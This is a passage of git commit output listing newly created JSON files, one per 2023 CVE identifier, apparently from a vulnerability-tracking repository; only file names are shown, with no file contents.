2023/CVE-2023-29406.json create mode 100644 2023/CVE-2023-29409.json create mode 100644 2023/CVE-2023-29439.json create mode 100644 2023/CVE-2023-29478.json create mode 100644 2023/CVE-2023-29489.json create mode 100644 2023/CVE-2023-2951.json create mode 100644 2023/CVE-2023-29808.json create mode 100644 2023/CVE-2023-29809.json create mode 100644 2023/CVE-2023-2982.json create mode 100644 2023/CVE-2023-29839.json create mode 100644 2023/CVE-2023-2986.json create mode 100644 2023/CVE-2023-29919.json create mode 100644 2023/CVE-2023-29922.json create mode 100644 2023/CVE-2023-29923.json create mode 100644 2023/CVE-2023-29929.json create mode 100644 2023/CVE-2023-29930.json create mode 100644 2023/CVE-2023-29983.json create mode 100644 2023/CVE-2023-30033.json create mode 100644 2023/CVE-2023-3009.json create mode 100644 2023/CVE-2023-30092.json create mode 100644 2023/CVE-2023-30145.json create mode 100644 2023/CVE-2023-30146.json create mode 100644 2023/CVE-2023-30185.json create mode 100644 2023/CVE-2023-30190.json create mode 100644 2023/CVE-2023-30212.json create mode 100644 2023/CVE-2023-30226.json create mode 100644 2023/CVE-2023-30253.json create mode 100644 2023/CVE-2023-30256.json create mode 100644 2023/CVE-2023-30258.json create mode 100644 2023/CVE-2023-30347.json create mode 100644 2023/CVE-2023-30367.json create mode 100644 2023/CVE-2023-30383.json create mode 100644 2023/CVE-2023-30458.json create mode 100644 2023/CVE-2023-30459.json create mode 100644 2023/CVE-2023-3047.json create mode 100644 2023/CVE-2023-30486.json create mode 100644 2023/CVE-2023-30533.json create mode 100644 2023/CVE-2023-30547.json create mode 100644 2023/CVE-2023-3076.json create mode 100644 2023/CVE-2023-30765.json create mode 100644 2023/CVE-2023-30777.json create mode 100644 2023/CVE-2023-3079.json create mode 100644 2023/CVE-2023-30800.json create mode 100644 2023/CVE-2023-30839.json create mode 100644 2023/CVE-2023-30845.json create mode 100644 2023/CVE-2023-30854.json create mode 100644 2023/CVE-2023-30943.json create mode 100644 2023/CVE-2023-31070.json create mode 100644 2023/CVE-2023-3124.json create mode 100644 2023/CVE-2023-31290.json create mode 100644 2023/CVE-2023-31320.json create mode 100644 2023/CVE-2023-31346.json create mode 100644 2023/CVE-2023-31355.json create mode 100644 2023/CVE-2023-31419.json create mode 100644 2023/CVE-2023-31433.json create mode 100644 2023/CVE-2023-31434.json create mode 100644 2023/CVE-2023-31435.json create mode 100644 2023/CVE-2023-31443.json create mode 100644 2023/CVE-2023-31445.json create mode 100644 2023/CVE-2023-31446.json create mode 100644 2023/CVE-2023-31497.json create mode 100644 2023/CVE-2023-31541.json create mode 100644 2023/CVE-2023-31546.json create mode 100644 2023/CVE-2023-31584.json create mode 100644 2023/CVE-2023-31594.json create mode 100644 2023/CVE-2023-31595.json create mode 100644 2023/CVE-2023-31606.json create mode 100644 2023/CVE-2023-3163.json create mode 100644 2023/CVE-2023-31634.json create mode 100644 2023/CVE-2023-31664.json create mode 100644 2023/CVE-2023-31702.json create mode 100644 2023/CVE-2023-31703.json create mode 100644 2023/CVE-2023-31704.json create mode 100644 2023/CVE-2023-31705.json create mode 100644 2023/CVE-2023-31711.json create mode 100644 2023/CVE-2023-31714.json create mode 100644 2023/CVE-2023-31716.json create mode 100644 2023/CVE-2023-31717.json create mode 100644 2023/CVE-2023-31718.json create mode 100644 2023/CVE-2023-31719.json create mode 100644 2023/CVE-2023-31726.json create mode 100644 2023/CVE-2023-31747.json create mode 100644 2023/CVE-2023-31753.json create mode 100644 2023/CVE-2023-31756.json create mode 100644 2023/CVE-2023-31779.json create mode 100644 2023/CVE-2023-31851.json create mode 100644 2023/CVE-2023-31852.json create mode 100644 2023/CVE-2023-31853.json create mode 100644 2023/CVE-2023-32031.json create mode 100644 2023/CVE-2023-32073.json create mode 100644 2023/CVE-2023-32117.json create mode 100644 2023/CVE-2023-32162.json create mode 100644 2023/CVE-2023-32163.json create mode 100644 2023/CVE-2023-32233.json create mode 100644 2023/CVE-2023-32235.json create mode 100644 2023/CVE-2023-32243.json create mode 100644 2023/CVE-2023-32314.json create mode 100644 2023/CVE-2023-32315.json create mode 100644 2023/CVE-2023-32353.json create mode 100644 2023/CVE-2023-32364.json create mode 100644 2023/CVE-2023-32407.json create mode 100644 2023/CVE-2023-32413.json create mode 100644 2023/CVE-2023-32422.json create mode 100644 2023/CVE-2023-32428.json create mode 100644 2023/CVE-2023-3244.json create mode 100644 2023/CVE-2023-32560.json create mode 100644 2023/CVE-2023-32571.json create mode 100644 2023/CVE-2023-32629.json create mode 100644 2023/CVE-2023-32681.json create mode 100644 2023/CVE-2023-3269.json create mode 100644 2023/CVE-2023-32707.json create mode 100644 2023/CVE-2023-32749.json create mode 100644 2023/CVE-2023-32784.json create mode 100644 2023/CVE-2023-32961.json create mode 100644 2023/CVE-2023-33105.json create mode 100644 2023/CVE-2023-33242.json create mode 100644 2023/CVE-2023-33243.json create mode 100644 2023/CVE-2023-33246.json create mode 100644 2023/CVE-2023-33253.json create mode 100644 2023/CVE-2023-33264.json create mode 100644 2023/CVE-2023-3338.json create mode 100644 2023/CVE-2023-33381.json create mode 100644 2023/CVE-2023-33404.json create mode 100644 2023/CVE-2023-33405.json create mode 100644 2023/CVE-2023-33408.json create mode 100644 2023/CVE-2023-33409.json create mode 100644 2023/CVE-2023-33410.json create mode 100644 2023/CVE-2023-33476.json create mode 100644 2023/CVE-2023-33477.json create mode 100644 2023/CVE-2023-33517.json create mode 100644 2023/CVE-2023-33580.json create mode 100644 2023/CVE-2023-33592.json create mode 100644 2023/CVE-2023-33617.json create mode 100644 2023/CVE-2023-33668.json create mode 100644 2023/CVE-2023-33669.json create mode 100644 2023/CVE-2023-33730.json create mode 100644 2023/CVE-2023-33731.json create mode 100644 2023/CVE-2023-33732.json create mode 100644 2023/CVE-2023-33733.json create mode 100644 2023/CVE-2023-33747.json create mode 100644 2023/CVE-2023-33768.json create mode 100644 2023/CVE-2023-33781.json create mode 100644 2023/CVE-2023-33782.json create mode 100644 2023/CVE-2023-33802.json create mode 100644 2023/CVE-2023-33817.json create mode 100644 2023/CVE-2023-33829.json create mode 100644 2023/CVE-2023-33831.json create mode 100644 2023/CVE-2023-3390.json create mode 100644 2023/CVE-2023-33902.json create mode 100644 2023/CVE-2023-33977.json create mode 100644 2023/CVE-2023-34034.json create mode 100644 2023/CVE-2023-34035.json create mode 100644 2023/CVE-2023-34039.json create mode 100644 2023/CVE-2023-34040.json create mode 100644 2023/CVE-2023-34050.json create mode 100644 2023/CVE-2023-34051.json create mode 100644 2023/CVE-2023-34092.json create mode 100644 2023/CVE-2023-34096.json create mode 100644 2023/CVE-2023-34152.json create mode 100644 2023/CVE-2023-34194.json create mode 100644 2023/CVE-2023-34212.json create mode 100644 2023/CVE-2023-34312.json create mode 100644 2023/CVE-2023-34362.json create mode 100644 2023/CVE-2023-34458.json create mode 100644 2023/CVE-2023-34468.json create mode 100644 2023/CVE-2023-3450.json create mode 100644 2023/CVE-2023-3452.json create mode 100644 2023/CVE-2023-34537.json create mode 100644 2023/CVE-2023-34584.json create mode 100644 2023/CVE-2023-34598.json create mode 100644 2023/CVE-2023-34599.json create mode 100644 2023/CVE-2023-3460.json create mode 100644 2023/CVE-2023-34600.json create mode 100644 2023/CVE-2023-34634.json create mode 100644 2023/CVE-2023-34830.json create mode 100644 2023/CVE-2023-34835.json create mode 100644 2023/CVE-2023-34836.json create mode 100644 2023/CVE-2023-34837.json create mode 100644 2023/CVE-2023-34838.json create mode 100644 2023/CVE-2023-34839.json create mode 100644 2023/CVE-2023-34840.json create mode 100644 2023/CVE-2023-34843.json create mode 100644 2023/CVE-2023-34845.json create mode 100644 2023/CVE-2023-34852.json create mode 100644 2023/CVE-2023-34853.json create mode 100644 2023/CVE-2023-34924.json create mode 100644 2023/CVE-2023-34960.json create mode 100644 2023/CVE-2023-34965.json create mode 100644 2023/CVE-2023-34992.json create mode 100644 2023/CVE-2023-35001.json create mode 100644 2023/CVE-2023-35078.json create mode 100644 2023/CVE-2023-35080.json create mode 100644 2023/CVE-2023-35082.json create mode 100644 2023/CVE-2023-35086.json create mode 100644 2023/CVE-2023-3519.json create mode 100644 2023/CVE-2023-35636.json create mode 100644 2023/CVE-2023-35671.json create mode 100644 2023/CVE-2023-35674.json create mode 100644 2023/CVE-2023-35687.json create mode 100644 2023/CVE-2023-35744.json create mode 100644 2023/CVE-2023-35793.json create mode 100644 2023/CVE-2023-35794.json create mode 100644 2023/CVE-2023-35801.json create mode 100644 2023/CVE-2023-35803.json create mode 100644 2023/CVE-2023-35813.json create mode 100644 2023/CVE-2023-35828.json create mode 100644 2023/CVE-2023-35840.json create mode 100644 2023/CVE-2023-35843.json create mode 100644 2023/CVE-2023-35844.json create mode 100644 2023/CVE-2023-35854.json create mode 100644 2023/CVE-2023-35885.json create mode 100644 2023/CVE-2023-35985.json create mode 100644 2023/CVE-2023-36003.json create mode 100644 2023/CVE-2023-36025.json create mode 100644 2023/CVE-2023-36076.json create mode 100644 2023/CVE-2023-36085.json create mode 100644 2023/CVE-2023-36109.json create mode 100644 2023/CVE-2023-36123.json create mode 100644 2023/CVE-2023-36143.json create mode 100644 2023/CVE-2023-36144.json create mode 100644 2023/CVE-2023-36146.json create mode 100644 2023/CVE-2023-36158.json create mode 100644 2023/CVE-2023-36159.json create mode 100644 2023/CVE-2023-36163.json create mode 100644 2023/CVE-2023-36164.json create mode 100644 2023/CVE-2023-36165.json create mode 100644 2023/CVE-2023-36168.json create mode 100644 2023/CVE-2023-36169.json create mode 100644 2023/CVE-2023-36250.json create mode 100644 2023/CVE-2023-36281.json create mode 100644 2023/CVE-2023-36319.json create mode 100644 2023/CVE-2023-3640.json create mode 100644 2023/CVE-2023-36407.json create mode 100644 2023/CVE-2023-36424.json create mode 100644 2023/CVE-2023-36427.json create mode 100644 2023/CVE-2023-36531.json create mode 100644 2023/CVE-2023-36643.json create mode 100644 2023/CVE-2023-36644.json create mode 100644 2023/CVE-2023-36645.json create mode 100644 2023/CVE-2023-36664.json create mode 100644 2023/CVE-2023-36723.json create mode 100644 2023/CVE-2023-36745.json create mode 100644 2023/CVE-2023-36802.json create mode 100644 2023/CVE-2023-36812.json create mode 100644 2023/CVE-2023-36844.json create mode 100644 2023/CVE-2023-36845.json create mode 100644 2023/CVE-2023-36846.json create mode 100644 2023/CVE-2023-36874.json create mode 100644 2023/CVE-2023-36884.json create mode 100644 2023/CVE-2023-36899.json create mode 100644 2023/CVE-2023-36900.json create mode 100644 2023/CVE-2023-37073.json create mode 100644 2023/CVE-2023-3710.json create mode 100644 2023/CVE-2023-3711.json create mode 100644 2023/CVE-2023-3712.json create mode 100644 2023/CVE-2023-37164.json create mode 100644 2023/CVE-2023-37189.json create mode 100644 2023/CVE-2023-37190.json create mode 100644 2023/CVE-2023-37191.json create mode 100644 2023/CVE-2023-3722.json create mode 100644 2023/CVE-2023-37250.json create mode 100644 2023/CVE-2023-37474.json create mode 100644 2023/CVE-2023-37478.json create mode 100644 2023/CVE-2023-37582.json create mode 100644 2023/CVE-2023-37596.json create mode 100644 2023/CVE-2023-37597.json create mode 100644 2023/CVE-2023-37598.json create mode 100644 2023/CVE-2023-37599.json create mode 100644 2023/CVE-2023-37621.json create mode 100644 2023/CVE-2023-37625.json create mode 100644 2023/CVE-2023-37739.json create mode 100644 2023/CVE-2023-37755.json create mode 100644 2023/CVE-2023-37756.json create mode 100644 2023/CVE-2023-37771.json create mode 100644 2023/CVE-2023-37772.json create mode 100644 2023/CVE-2023-37778.json create mode 100644 2023/CVE-2023-37779.json create mode 100644 2023/CVE-2023-37786.json create mode 100644 2023/CVE-2023-37790.json create mode 100644 2023/CVE-2023-37800.json create mode 100644 2023/CVE-2023-37903.json create mode 100644 2023/CVE-2023-37941.json create mode 100644 2023/CVE-2023-37979.json create mode 100644 2023/CVE-2023-38035.json create mode 100644 2023/CVE-2023-38039.json create mode 100644 2023/CVE-2023-38041.json create mode 100644 2023/CVE-2023-38120.json create mode 100644 2023/CVE-2023-38146.json create mode 100644 2023/CVE-2023-3824.json create mode 100644 2023/CVE-2023-3836.json create mode 100644 2023/CVE-2023-38408.json create mode 100644 2023/CVE-2023-38434.json create mode 100644 2023/CVE-2023-38490.json create mode 100644 2023/CVE-2023-38497.json create mode 100644 2023/CVE-2023-38499.json create mode 100644 2023/CVE-2023-38545.json create mode 100644 2023/CVE-2023-38571.json create mode 100644 2023/CVE-2023-38609.json create mode 100644 2023/CVE-2023-38632.json create mode 100644 2023/CVE-2023-38646.json create mode 100644 2023/CVE-2023-38709.json create mode 100644 2023/CVE-2023-38743.json create mode 100644 2023/CVE-2023-3881.json create mode 100644 2023/CVE-2023-38817.json create mode 100644 2023/CVE-2023-38820.json create mode 100644 2023/CVE-2023-38821.json create mode 100644 2023/CVE-2023-38822.json create mode 100644 2023/CVE-2023-38829.json create mode 100644 2023/CVE-2023-38831.json create mode 100644 2023/CVE-2023-38836.json create mode 100644 2023/CVE-2023-38840.json create mode 100644 2023/CVE-2023-38890.json create mode 100644 2023/CVE-2023-38891.json create mode 100644 2023/CVE-2023-3897.json create mode 100644 2023/CVE-2023-39024.json create mode 100644 2023/CVE-2023-39062.json create mode 100644 2023/CVE-2023-39063.json create mode 100644 2023/CVE-2023-39115.json create mode 100644 2023/CVE-2023-39144.json create mode 100644 2023/CVE-2023-39320.json create mode 100644 2023/CVE-2023-39361.json create mode 100644 2023/CVE-2023-39362.json create mode 100644 2023/CVE-2023-39526.json create mode 100644 2023/CVE-2023-39539.json create mode 100644 2023/CVE-2023-39593.json create mode 100644 2023/CVE-2023-39707.json create mode 100644 2023/CVE-2023-39708.json create mode 100644 2023/CVE-2023-39709.json create mode 100644 2023/CVE-2023-3971.json create mode 100644 2023/CVE-2023-39710.json create mode 100644 2023/CVE-2023-39711.json create mode 100644 2023/CVE-2023-39712.json create mode 100644 2023/CVE-2023-39714.json create mode 100644 2023/CVE-2023-39725.json create mode 100644 2023/CVE-2023-40000.json create mode 100644 2023/CVE-2023-40028.json create mode 100644 2023/CVE-2023-40031.json create mode 100644 2023/CVE-2023-40037.json create mode 100644 2023/CVE-2023-40044.json create mode 100644 2023/CVE-2023-40084.json create mode 100644 2023/CVE-2023-40109.json create mode 100644 2023/CVE-2023-40121.json create mode 100644 2023/CVE-2023-40127.json create mode 100644 2023/CVE-2023-40133.json create mode 100644 2023/CVE-2023-40140.json create mode 100644 2023/CVE-2023-40275.json create mode 100644 2023/CVE-2023-40276.json create mode 100644 2023/CVE-2023-40277.json create mode 100644 2023/CVE-2023-40278.json create mode 100644 2023/CVE-2023-40279.json create mode 100644 2023/CVE-2023-40280.json create mode 100644 2023/CVE-2023-40294.json create mode 100644 2023/CVE-2023-40296.json create mode 100644 2023/CVE-2023-40297.json create mode 100644 2023/CVE-2023-40361.json create mode 100644 2023/CVE-2023-40362.json create mode 100644 2023/CVE-2023-40404.json create mode 100644 2023/CVE-2023-40429.json create mode 100644 2023/CVE-2023-40459.json create mode 100644 2023/CVE-2023-40477.json create mode 100644 2023/CVE-2023-40600.json create mode 100644 2023/CVE-2023-40626.json create mode 100644 2023/CVE-2023-40868.json create mode 100644 2023/CVE-2023-40869.json create mode 100644 2023/CVE-2023-40924.json create mode 100644 2023/CVE-2023-40930.json create mode 100644 2023/CVE-2023-40931.json create mode 100644 2023/CVE-2023-40933.json create mode 100644 2023/CVE-2023-40989.json create mode 100644 2023/CVE-2023-41064.json create mode 100644 2023/CVE-2023-41080.json create mode 100644 2023/CVE-2023-41265.json create mode 100644 2023/CVE-2023-4128.json create mode 100644 2023/CVE-2023-41362.json create mode 100644 2023/CVE-2023-41425.json create mode 100644 2023/CVE-2023-41436.json create mode 100644 2023/CVE-2023-4145.json create mode 100644 2023/CVE-2023-4147.json create mode 100644 2023/CVE-2023-41474.json create mode 100644 2023/CVE-2023-41507.json create mode 100644 2023/CVE-2023-41508.json create mode 100644 2023/CVE-2023-41533.json create mode 100644 2023/CVE-2023-41534.json create mode 100644 2023/CVE-2023-41535.json create mode 100644 2023/CVE-2023-41564.json create mode 100644 2023/CVE-2023-41575.json create mode 100644 2023/CVE-2023-41592.json create mode 100644 2023/CVE-2023-41593.json create mode 100644 2023/CVE-2023-41613.json create mode 100644 2023/CVE-2023-41623.json create mode 100644 2023/CVE-2023-41646.json create mode 100644 2023/CVE-2023-4165.json create mode 100644 2023/CVE-2023-41652.json create mode 100644 2023/CVE-2023-4166.json create mode 100644 2023/CVE-2023-4169.json create mode 100644 2023/CVE-2023-41717.json create mode 100644 2023/CVE-2023-4174.json create mode 100644 2023/CVE-2023-41772.json create mode 100644 2023/CVE-2023-41892.json create mode 100644 2023/CVE-2023-4197.json create mode 100644 2023/CVE-2023-41991.json create mode 100644 2023/CVE-2023-41993.json create mode 100644 2023/CVE-2023-4206.json create mode 100644 2023/CVE-2023-42115.json create mode 100644 2023/CVE-2023-422.json create mode 100644 2023/CVE-2023-4220.json create mode 100644 2023/CVE-2023-42222.json create mode 100644 2023/CVE-2023-4226.json create mode 100644 2023/CVE-2023-42283.json create mode 100644 2023/CVE-2023-42284.json create mode 100644 2023/CVE-2023-42326.json create mode 100644 2023/CVE-2023-42362.json create mode 100644 2023/CVE-2023-42413.json create mode 100644 2023/CVE-2023-42426.json create mode 100644 2023/CVE-2023-42442.json create mode 100644 2023/CVE-2023-42468.json create mode 100644 2023/CVE-2023-42469.json create mode 100644 2023/CVE-2023-42470.json create mode 100644 2023/CVE-2023-42471.json create mode 100644 2023/CVE-2023-4278.json create mode 100644 2023/CVE-2023-42789.json create mode 100644 2023/CVE-2023-4279.json create mode 100644 2023/CVE-2023-42793.json create mode 100644 2023/CVE-2023-4281.json create mode 100644 2023/CVE-2023-42819.json create mode 100644 2023/CVE-2023-42820.json create mode 100644 2023/CVE-2023-42860.json create mode 100644 2023/CVE-2023-42931.json create mode 100644 2023/CVE-2023-4294.json create mode 100644 2023/CVE-2023-4300.json create mode 100644 2023/CVE-2023-43040.json create mode 100644 2023/CVE-2023-43115.json create mode 100644 2023/CVE-2023-43144.json create mode 100644 2023/CVE-2023-43147.json create mode 100644 2023/CVE-2023-43148.json create mode 100644 2023/CVE-2023-43149.json create mode 100644 2023/CVE-2023-43154.json create mode 100644 2023/CVE-2023-43177.json create mode 100644 2023/CVE-2023-43208.json create mode 100644 2023/CVE-2023-43261.json create mode 100644 2023/CVE-2023-43263.json create mode 100644 2023/CVE-2023-43284.json create mode 100644 2023/CVE-2023-43317.json create mode 100644 2023/CVE-2023-43318.json create mode 100644 2023/CVE-2023-43323.json create mode 100644 2023/CVE-2023-43325.json create mode 100644 2023/CVE-2023-43326.json create mode 100644 2023/CVE-2023-43339.json create mode 100644 2023/CVE-2023-43340.json create mode 100644 2023/CVE-2023-43341.json create mode 100644 2023/CVE-2023-43342.json create mode 100644 2023/CVE-2023-43343.json create mode 100644 2023/CVE-2023-43344.json create mode 100644 2023/CVE-2023-43345.json create mode 100644 2023/CVE-2023-43346.json create mode 100644 2023/CVE-2023-43352.json create mode 100644 2023/CVE-2023-43353.json create mode 100644 2023/CVE-2023-43354.json create mode 100644 2023/CVE-2023-43355.json create mode 100644 2023/CVE-2023-43356.json create mode 100644 2023/CVE-2023-43357.json create mode 100644 2023/CVE-2023-43358.json create mode 100644 2023/CVE-2023-43359.json create mode 100644 2023/CVE-2023-43360.json create mode 100644 2023/CVE-2023-43364.json create mode 100644 2023/CVE-2023-43481.json create mode 100644 2023/CVE-2023-43482.json create mode 100644 2023/CVE-2023-43494.json create mode 100644 2023/CVE-2023-4357.json create mode 100644 2023/CVE-2023-43622.json create mode 100644 2023/CVE-2023-43646.json create mode 100644 2023/CVE-2023-43654.json create mode 100644 2023/CVE-2023-43667.json create mode 100644 2023/CVE-2023-43757.json create mode 100644 2023/CVE-2023-43770.json create mode 100644 2023/CVE-2023-43786.json create mode 100644 2023/CVE-2023-43838.json create mode 100644 2023/CVE-2023-43871.json create mode 100644 2023/CVE-2023-43872.json create mode 100644 2023/CVE-2023-43873.json create mode 100644 2023/CVE-2023-43874.json create mode 100644 2023/CVE-2023-43875.json create mode 100644 2023/CVE-2023-43876.json create mode 100644 2023/CVE-2023-43877.json create mode 100644 2023/CVE-2023-43878.json create mode 100644 2023/CVE-2023-43879.json create mode 100644 2023/CVE-2023-43955.json create mode 100644 2023/CVE-2023-44061.json create mode 100644 2023/CVE-2023-4427.json create mode 100644 2023/CVE-2023-44451.json create mode 100644 2023/CVE-2023-44452.json create mode 100644 2023/CVE-2023-44487.json create mode 100644 2023/CVE-2023-4450.json create mode 100644 2023/CVE-2023-4460.json create mode 100644 2023/CVE-2023-44758.json create mode 100644 2023/CVE-2023-44760.json create mode 100644 2023/CVE-2023-44761.json create mode 100644 2023/CVE-2023-44762.json create mode 100644 2023/CVE-2023-44763.json create mode 100644 2023/CVE-2023-44764.json create mode 100644 2023/CVE-2023-44765.json create mode 100644 2023/CVE-2023-44766.json create mode 100644 2023/CVE-2023-44767.json create mode 100644 2023/CVE-2023-44769.json create mode 100644 2023/CVE-2023-44770.json create mode 100644 2023/CVE-2023-44771.json create mode 100644 2023/CVE-2023-44811.json create mode 100644 2023/CVE-2023-44812.json create mode 100644 2023/CVE-2023-44813.json create mode 100644 2023/CVE-2023-44961.json create mode 100644 2023/CVE-2023-44962.json create mode 100644 2023/CVE-2023-44976.json create mode 100644 2023/CVE-2023-45158.json create mode 100644 2023/CVE-2023-45182.json create mode 100644 2023/CVE-2023-45184.json create mode 100644 2023/CVE-2023-45185.json create mode 100644 2023/CVE-2023-45239.json create mode 100644 2023/CVE-2023-45280.json create mode 100644 2023/CVE-2023-45288.json create mode 100644 2023/CVE-2023-4542.json create mode 100644 2023/CVE-2023-45471.json create mode 100644 2023/CVE-2023-4549.json create mode 100644 2023/CVE-2023-45503.json create mode 100644 2023/CVE-2023-45540.json create mode 100644 2023/CVE-2023-45542.json create mode 100644 2023/CVE-2023-45657.json create mode 100644 2023/CVE-2023-4568.json create mode 100644 2023/CVE-2023-45777.json create mode 100644 2023/CVE-2023-45779.json create mode 100644 2023/CVE-2023-45819.json create mode 100644 2023/CVE-2023-45827.json create mode 100644 2023/CVE-2023-45828.json create mode 100644 2023/CVE-2023-45857.json create mode 100644 2023/CVE-2023-45866.json create mode 100644 2023/CVE-2023-4590.json create mode 100644 2023/CVE-2023-4596.json create mode 100644 2023/CVE-2023-45966.json create mode 100644 2023/CVE-2023-45992.json create mode 100644 2023/CVE-2023-46003.json create mode 100644 2023/CVE-2023-46012.json create mode 100644 2023/CVE-2023-46014.json create mode 100644 2023/CVE-2023-46015.json create mode 100644 2023/CVE-2023-46016.json create mode 100644 2023/CVE-2023-46017.json create mode 100644 2023/CVE-2023-46018.json create mode 100644 2023/CVE-2023-46019.json create mode 100644 2023/CVE-2023-46020.json create mode 100644 2023/CVE-2023-46021.json create mode 100644 2023/CVE-2023-46022.json create mode 100644 2023/CVE-2023-46197.json create mode 100644 2023/CVE-2023-4622.json create mode 100644 2023/CVE-2023-46303.json create mode 100644 2023/CVE-2023-46304.json create mode 100644 2023/CVE-2023-4631.json create mode 100644 2023/CVE-2023-4634.json create mode 100644 2023/CVE-2023-46344.json create mode 100644 2023/CVE-2023-4636.json create mode 100644 2023/CVE-2023-46371.json create mode 100644 2023/CVE-2023-46404.json create mode 100644 2023/CVE-2023-46442.json create mode 100644 2023/CVE-2023-46447.json create mode 100644 2023/CVE-2023-46449.json create mode 100644 2023/CVE-2023-46450.json create mode 100644 2023/CVE-2023-46451.json create mode 100644 2023/CVE-2023-46454.json create mode 100644 2023/CVE-2023-46474.json create mode 100644 2023/CVE-2023-46478.json create mode 100644 2023/CVE-2023-46501.json create mode 100644 2023/CVE-2023-46604.json create mode 100644 2023/CVE-2023-46615.json create mode 100644 2023/CVE-2023-46694.json create mode 100644 2023/CVE-2023-46747.json create mode 100644 2023/CVE-2023-46805.json create mode 100644 2023/CVE-2023-46813.json create mode 100644 2023/CVE-2023-46818.json create mode 100644 2023/CVE-2023-4683.json create mode 100644 2023/CVE-2023-46865.json create mode 100644 2023/CVE-2023-46870.json create mode 100644 2023/CVE-2023-46948.json create mode 100644 2023/CVE-2023-46954.json create mode 100644 2023/CVE-2023-4696.json create mode 100644 2023/CVE-2023-46974.json create mode 100644 2023/CVE-2023-4698.json create mode 100644 2023/CVE-2023-46980.json create mode 100644 2023/CVE-2023-4699.json create mode 100644 2023/CVE-2023-46998.json create mode 100644 2023/CVE-2023-47014.json create mode 100644 2023/CVE-2023-47102.json create mode 100644 2023/CVE-2023-47108.json create mode 100644 2023/CVE-2023-47119.json create mode 100644 2023/CVE-2023-47129.json create mode 100644 2023/CVE-2023-47179.json create mode 100644 2023/CVE-2023-47218.json create mode 100644 2023/CVE-2023-47246.json create mode 100644 2023/CVE-2023-47253.json create mode 100644 2023/CVE-2023-47355.json create mode 100644 2023/CVE-2023-47400.json create mode 100644 2023/CVE-2023-4741.json create mode 100644 2023/CVE-2023-47437.json create mode 100644 2023/CVE-2023-47459.json create mode 100644 2023/CVE-2023-47460.json create mode 100644 2023/CVE-2023-47464.json create mode 100644 2023/CVE-2023-47488.json create mode 100644 2023/CVE-2023-47489.json create mode 100644 2023/CVE-2023-47504.json create mode 100644 2023/CVE-2023-47529.json create mode 100644 2023/CVE-2023-47564.json create mode 100644 2023/CVE-2023-4762.json create mode 100644 2023/CVE-2023-47668.json create mode 100644 2023/CVE-2023-4771.json create mode 100644 2023/CVE-2023-47840.json create mode 100644 2023/CVE-2023-47882.json create mode 100644 2023/CVE-2023-47883.json create mode 100644 2023/CVE-2023-47889.json create mode 100644 2023/CVE-2023-4800.json create mode 100644 2023/CVE-2023-48022.json create mode 100644 2023/CVE-2023-48028.json create mode 100644 2023/CVE-2023-48029.json create mode 100644 2023/CVE-2023-48031.json create mode 100644 2023/CVE-2023-48034.json create mode 100644 2023/CVE-2023-48084.json create mode 100644 2023/CVE-2023-48104.json create mode 100644 2023/CVE-2023-48123.json create mode 100644 2023/CVE-2023-4813.json create mode 100644 2023/CVE-2023-48194.json create mode 100644 2023/CVE-2023-48197.json create mode 100644 2023/CVE-2023-48198.json create mode 100644 2023/CVE-2023-48199.json create mode 100644 2023/CVE-2023-48200.json create mode 100644 2023/CVE-2023-4863.json create mode 100644 2023/CVE-2023-48777.json create mode 100644 2023/CVE-2023-48788.json create mode 100644 2023/CVE-2023-48842.json create mode 100644 2023/CVE-2023-48849.json create mode 100644 2023/CVE-2023-48858.json create mode 100644 2023/CVE-2023-48866.json create mode 100644 2023/CVE-2023-48974.json create mode 100644 2023/CVE-2023-48981.json create mode 100644 2023/CVE-2023-48982.json create mode 100644 2023/CVE-2023-48983.json create mode 100644 2023/CVE-2023-49002.json create mode 100644 2023/CVE-2023-49003.json create mode 100644 2023/CVE-2023-49038.json create mode 100644 2023/CVE-2023-49052.json create mode 100644 2023/CVE-2023-49070.json create mode 100644 2023/CVE-2023-49103.json create mode 100644 2023/CVE-2023-49105.json create mode 100644 2023/CVE-2023-4911.json create mode 100644 2023/CVE-2023-49313.json create mode 100644 2023/CVE-2023-49314.json create mode 100644 2023/CVE-2023-49339.json create mode 100644 2023/CVE-2023-49438.json create mode 100644 2023/CVE-2023-49453.json create mode 100644 2023/CVE-2023-49471.json create mode 100644 2023/CVE-2023-49496.json create mode 100644 2023/CVE-2023-49539.json create mode 100644 2023/CVE-2023-49540.json create mode 100644 2023/CVE-2023-49543.json create mode 100644 2023/CVE-2023-49544.json create mode 100644 2023/CVE-2023-49545.json create mode 100644 2023/CVE-2023-49546.json create mode 100644 2023/CVE-2023-49547.json create mode 100644 2023/CVE-2023-49548.json create mode 100644 2023/CVE-2023-49606.json create mode 100644 2023/CVE-2023-4966.json create mode 100644 2023/CVE-2023-49950.json create mode 100644 2023/CVE-2023-49954.json create mode 100644 2023/CVE-2023-49964.json create mode 100644 2023/CVE-2023-49965.json create mode 100644 2023/CVE-2023-49968.json create mode 100644 2023/CVE-2023-49969.json create mode 100644 2023/CVE-2023-49970.json create mode 100644 2023/CVE-2023-49971.json create mode 100644 2023/CVE-2023-49973.json create mode 100644 2023/CVE-2023-49974.json create mode 100644 2023/CVE-2023-49976.json create mode 100644 2023/CVE-2023-49977.json create mode 100644 2023/CVE-2023-49978.json create mode 100644 2023/CVE-2023-49979.json create mode 100644 2023/CVE-2023-49980.json create mode 100644 2023/CVE-2023-49981.json create mode 100644 2023/CVE-2023-49982.json create mode 100644 2023/CVE-2023-49983.json create mode 100644 2023/CVE-2023-49984.json create mode 100644 2023/CVE-2023-49985.json create mode 100644 2023/CVE-2023-49986.json create mode 100644 2023/CVE-2023-49987.json create mode 100644 2023/CVE-2023-49988.json create mode 100644 2023/CVE-2023-49989.json create mode 100644 2023/CVE-2023-50029.json create mode 100644 2023/CVE-2023-50070.json create mode 100644 2023/CVE-2023-50071.json create mode 100644 2023/CVE-2023-50072.json create mode 100644 2023/CVE-2023-50094.json create mode 100644 2023/CVE-2023-50131.json create mode 100644 2023/CVE-2023-50132.json create mode 100644 2023/CVE-2023-50164.json create mode 100644 2023/CVE-2023-50226.json create mode 100644 2023/CVE-2023-5024.json create mode 100644 2023/CVE-2023-50245.json create mode 100644 2023/CVE-2023-50254.json create mode 100644 2023/CVE-2023-50386.json create mode 100644 2023/CVE-2023-50387.json create mode 100644 2023/CVE-2023-5043.json create mode 100644 2023/CVE-2023-5044.json create mode 100644 2023/CVE-2023-50465.json create mode 100644 2023/CVE-2023-50564.json create mode 100644 2023/CVE-2023-50596.json create mode 100644 2023/CVE-2023-50643.json create mode 100644 2023/CVE-2023-50685.json create mode 100644 2023/CVE-2023-5070.json create mode 100644 2023/CVE-2023-50780.json create mode 100644 2023/CVE-2023-50868.json create mode 100644 2023/CVE-2023-5089.json create mode 100644 